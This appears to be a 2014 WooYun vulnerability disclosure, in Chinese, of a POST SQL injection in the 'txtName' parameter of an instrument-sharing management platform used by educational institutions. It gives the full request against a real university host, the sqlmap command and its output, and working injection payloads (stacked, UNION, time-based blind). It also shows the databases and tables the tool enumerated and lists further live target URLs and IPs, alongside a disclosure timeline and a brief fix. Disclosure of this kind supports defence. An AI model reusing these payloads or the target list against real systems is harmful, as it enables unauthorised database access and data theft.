当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070339

漏洞标题:某通用型教育学院仪器管理平台存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 炊烟

提交时间:2014-07-31 16:52

修复时间:2014-10-29 16:54

公开时间:2014-10-29 16:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经确认,细节仅向厂商公开
2014-08-08: 细节向第三方安全合作伙伴开放
2014-09-29: 细节向核心白帽子及相关领域专家公开
2014-10-09: 细节向普通白帽子公开
2014-10-19: 细节向实习白帽子公开
2014-10-29: 细节向公众公开

简要描述:

前人挖过的,求前台~

详细说明:

1.厂商名称:南京先极科技有限公司
2.官网:http://www.changedu.com/
3.产品名称:大型仪器设备开放共享管理平台


在 ProjectList.asp 中依旧存在POST注入


POST数据:

POST /sy/share/SHowFiles/ProjectList.aspx HTTP/1.1
Host: sjjx.njit.edu.cn
Proxy-Connection: keep-alive
Content-Length: 670
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sjjx.njit.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://sjjx.njit.edu.cn/sy/share/SHowFiles/ProjectList.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=1q5c5y45n2dqud55xkw53l3f
__VIEWSTATE=%2FwEPDwUKLTI2ODYxNDE3MQ9kFgICAw9kFgQCCw8WAh4LXyFJdGVtQ291bnRmZAINDxYCHgdWaXNpYmxlaBYCZg9kFgJmD2QWCgIHDw8WAh4EVGV4dAUBMWRkAgkPDxYEHwIFD%2BesrOS4gOmhtSZuYnNwOx4HRW5hYmxlZGhkZAIKDw8WBB8CBRUmbmJzcDvkuIrkuIDpobUmbmJzcDsfA2hkZAILDw8WAh8DaGRkAg0PDxYCHwNoZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMRqMD6L64X01ljzELh4Hcc6r%2BJ88&__EVENTVALIDATION=%2FwEWEQL15da7CALEhISFCwKIlsrCCwLTzsmzBAKv2cqzBALn7fnWDwKxpdLmAQKC%2F5KeBALKlvrJDgKtoKrKDgLF9sbXAgL22sCxBQLuo%2BGjDAKe%2B4jZCwL929TPDAKPu9nlAgLSwpnTCKJDd7R7LTW5sah0IMPVWIu8MC5t&txtName=xxxx&txtsyyq=%B1%D8%D7%F6&txtsylb=%BB%F9%B4%A1&txtsylx=%D1%DD%CA%BE%D0%D4&ImageButton1.x=54&ImageButton1.y=9


将上面的包保存为1.txt

漏洞证明:

C:\Python27\sqlmap>sqlmap.py -r 1.txt
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:30:27
[15:30:27] [INFO] parsing HTTP request from '1.txt'
[15:30:27] [INFO] testing connection to the target URL
[15:30:27] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[15:30:28] [INFO] target URL is stable
[15:30:28] [INFO] ignoring POST parameter '__VIEWSTATE'
[15:30:28] [INFO] ignoring POST parameter '__EVENTVALIDATION'
[15:30:28] [INFO] testing if POST parameter 'txtName' is dynamic
[15:30:28] [WARNING] POST parameter 'txtName' does not appear dynamic
[15:30:28] [INFO] heuristic (basic) test shows that POST parameter 'txtName' mig
ht be injectable (possible DBMS: 'Microsoft SQL Server')
[15:30:28] [INFO] testing for SQL injection on POST parameter 'txtName'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] y
[15:30:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:30:33] [WARNING] reflective value(s) found and filtering out
[15:30:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[15:30:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[15:30:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[15:30:50] [INFO] POST parameter 'txtName' is 'Microsoft SQL Server/Sybase stack
ed conditional-error blind queries' injectable
[15:30:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl
ause'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:30:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:30:51] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:31:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:31:11] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[15:31:30] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[15:32:30] [INFO] POST parameter 'txtName' is 'Microsoft SQL Server/Sybase AND t
ime-based blind (heavy query - comment)' injectable
[15:32:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:32:30] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[15:33:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[15:33:00] [WARNING] most probably web server instance hasn't recovered yet from
 previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[15:33:05] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[15:33:07] [INFO] target URL appears to have 27 columns in query
[15:33:09] [INFO] POST parameter 'txtName' is 'Generic UNION query (NULL) - 1 to
 20 columns' injectable
POST parameter 'txtName' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 55 HTTP(s) requ
ests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwUKLTI2ODYxNDE3MQ9kFgICAw9kFgQCCw8WAh4LXyFJdGVtQ29
1bnRmZAINDxYCHgdWaXNpYmxlaBYCZg9kFgJmD2QWCgIHDw8WAh4EVGV4dAUBMWRkAgkPDxYEHwIFD+e
srOS4gOmhtSZuYnNwOx4HRW5hYmxlZGhkZAIKDw8WBB8CBRUmbmJzcDvkuIrkuIDpobUmbmJzcDsfA2h
kZAILDw8WBB8CBRUmbmJzcDvkuIvkuIDpobUmbmJzcDsfA2hkZAINDw8WBB8CBQzmnIDlkI7kuIDpobU
fA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xmc00CPD
iGbcmCbBPcpDvRpY6T1k=&__EVENTVALIDATION=/wEWEQKKwJihAwLEhISFCwKIlsrCCwLTzsmzBAKv
2cqzBALn7fnWDwKxpdLmAQKC/5KeBALKlvrJDgKtoKrKDgLF9sbXAgL22sCxBQLuo+GjDAKe+4jZCwL9
29TPDAKPu9nlAgLSwpnTCNTbM9M8aMDmmBxI7gk1wqNYdhJt&txtName=xxxx'; IF(7447=7447) SE
LECT 7447 ELSE DROP FUNCTION IzMw--&txtsyyq=%B1%D8%D7%F6&txtsylb=%BB%F9%B4%A1&tx
tsylx=%D1%DD%CA%BE%D0%D4&ImageButton1.x=54&ImageButton1.y=9
    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: __VIEWSTATE=/wEPDwUKLTI2ODYxNDE3MQ9kFgICAw9kFgQCCw8WAh4LXyFJdGVtQ29
1bnRmZAINDxYCHgdWaXNpYmxlaBYCZg9kFgJmD2QWCgIHDw8WAh4EVGV4dAUBMWRkAgkPDxYEHwIFD+e
srOS4gOmhtSZuYnNwOx4HRW5hYmxlZGhkZAIKDw8WBB8CBRUmbmJzcDvkuIrkuIDpobUmbmJzcDsfA2h
kZAILDw8WBB8CBRUmbmJzcDvkuIvkuIDpobUmbmJzcDsfA2hkZAINDw8WBB8CBQzmnIDlkI7kuIDpobU
fA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xmc00CPD
iGbcmCbBPcpDvRpY6T1k=&__EVENTVALIDATION=/wEWEQKKwJihAwLEhISFCwKIlsrCCwLTzsmzBAKv
2cqzBALn7fnWDwKxpdLmAQKC/5KeBALKlvrJDgKtoKrKDgLF9sbXAgL22sCxBQLuo+GjDAKe+4jZCwL9
29TPDAKPu9nlAgLSwpnTCNTbM9M8aMDmmBxI7gk1wqNYdhJt&txtName=xxxx' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(113)+CHAR(110)+
CHAR(113)+CHAR(84)+CHAR(68)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(75)+CHAR(114)+CHAR
(111)+CHAR(99)+CHAR(67)+CHAR(113)+CHAR(117)+CHAR(122)+CHAR(113)+CHAR(113),NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL-- &txtsyyq=%B1%D8%D7%F6&txtsylb=%BB%F9%B4%A1&txtsylx=%D1%DD%CA%BE%D0%D4&Imag
eButton1.x=54&ImageButton1.y=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query - comme
nt)
    Payload: __VIEWSTATE=/wEPDwUKLTI2ODYxNDE3MQ9kFgICAw9kFgQCCw8WAh4LXyFJdGVtQ29
1bnRmZAINDxYCHgdWaXNpYmxlaBYCZg9kFgJmD2QWCgIHDw8WAh4EVGV4dAUBMWRkAgkPDxYEHwIFD+e
srOS4gOmhtSZuYnNwOx4HRW5hYmxlZGhkZAIKDw8WBB8CBRUmbmJzcDvkuIrkuIDpobUmbmJzcDsfA2h
kZAILDw8WBB8CBRUmbmJzcDvkuIvkuIDpobUmbmJzcDsfA2hkZAINDw8WBB8CBQzmnIDlkI7kuIDpobU
fA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xmc00CPD
iGbcmCbBPcpDvRpY6T1k=&__EVENTVALIDATION=/wEWEQKKwJihAwLEhISFCwKIlsrCCwLTzsmzBAKv
2cqzBALn7fnWDwKxpdLmAQKC/5KeBALKlvrJDgKtoKrKDgLF9sbXAgL22sCxBQLuo+GjDAKe+4jZCwL9
29TPDAKPu9nlAgLSwpnTCNTbM9M8aMDmmBxI7gk1wqNYdhJt&txtName=xxxx' AND 7470=(SELECT
COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys
4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--&txtsyyq=%B1%D8%D7%F6&txt
sylb=%BB%F9%B4%A1&txtsylx=%D1%DD%CA%BE%D0%D4&ImageButton1.x=54&ImageButton1.y=9
---
[16:39:42] [INFO] testing Microsoft SQL Server
[16:39:56] [INFO] confirming Microsoft SQL Server
[16:39:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:39:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times
[16:39:57] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\sjjx.njit.edu.cn'
[*] shutting down at 16:39:57


available databases [10]:
[*] master
[*] model
[*] msdb
[*] ngc_jingsai
[*] NJGC_ChuangXin
[*] NJGC_lw
[*] NJGC_SY
[*] NJGC_Teach
[*] ReportServer
[*] tempdb
[16:43:42] [INFO] fetched data logg
tput\sjjx.njit.edu.cn'
[*] shutting down at 16:43:42


Database: NJGC_SY
[20 tables]
+-----------------+
| T_kbjsvalue     |
| t_bg2old        |
| t_bg4old        |
| t_canshu        |
| t_chengjiRate   |
| t_class         |
| t_course        |
| t_coursexy      |
| t_equjxxx       |
| t_experiment    |
| t_experimentold |
| t_jmyqdataold   |
| t_key           |
| t_procent       |
| t_propc         |
| t_rulekf        |
| t_sqyyvalue     |
| t_userold       |
| t_userotherold  |
| t_xsinsertlab   |
+-----------------+
[16:44:32] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\sjjx.njit.edu.cn'
[*] shutting down at 16:44:32




http://sjjx.njit.edu.cn/sy/share/SHowFiles/ProjectList.aspx
http://210.29.132.248/ShowFiles/ProjectList.aspx
http://210.29.152.168/syjx/share/ShowFiles/ProjectList.aspx
http://202.195.250.37/syjx/share/ShowFiles/ProjectList.aspx
http://web168444.5udns.cn/ShowFiles/ProjectList.aspx
.......

修复方案:

过滤post数据

版权声明:转载请注明来源 炊烟@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-08-05 09:23

厂商回复:

CNVD确认所述情况,由CNVD按以往联系渠道向软件生产厂商通报。

最新状态:

暂无